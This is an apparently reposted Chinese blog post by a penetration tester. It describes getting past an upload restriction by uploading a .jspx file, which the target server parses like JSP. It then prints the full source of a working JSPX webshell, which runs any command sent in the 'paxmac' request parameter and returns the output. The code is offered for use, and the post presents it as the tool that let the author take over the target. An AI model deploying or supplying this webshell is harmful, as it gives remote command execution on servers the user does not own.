這幾天在做滲透測試的時候，發現一個有趣的東西。目標有上傳漏洞，但是無論如何都沒法讓webshell執行。訪問任何jsp檔案都跳到登入的地 方，然後嘗試過變換jsp的大小寫，雖然不跳了，但是直接不解析，利用apache的解析漏洞上傳檔案，也不解析。後來只能放棄…

今天在工作中做另外一個站的滲透測試的時候，有個很特別的東西，JSPX，發現可以解析。然後去找了下是否apache預設解析jspx的檔案。 qingshen大牛，直接把配置的截圖發過來，瞅了下，果然是類似iis解析cer、asa這類檔案，作為一個jsp的對映。後來去網上找有沒有 jspx的馬，結果是沒有找到的說，後來無才大牛丟了一個過來，上傳，解析，搞定目標。呱呱…

<jsp:root xmlns:jsp="http://java.sun.com/JSP/Page"
          xmlns="http://www.w3.org/1999/xhtml"
          xmlns:c="http://java.sun.com/jsp/jstl/core" version="1.2">
    <jsp:directive.page contentType="text/html" pageEncoding="gb2312"/>
    <jsp:directive.page import="java.io.*"/>

    <html>
        <head>
            <title>jspx</title>
        </head>
        <body>
            <jsp:scriptlet>
               try {
		String cmd = request.getParameter("paxmac");
		if (cmd !=null){
			Process child = Runtime.getRuntime().exec(cmd);
			InputStream in = child.getInputStream();
			int c;
			while ((c = in.read()) != -1) {
			out.print((char)c);
			}
			in.close();
			try {
			child.waitFor();
			} catch (InterruptedException e) {
			e.printStackTrace();
		}
		}
		} catch (IOException e) {
		System.err.println(e);
		}
            </jsp:scriptlet>
        </body>
    </html>
</jsp:root>
 

原文轉載自：http://blog.paxmac.org/?p=431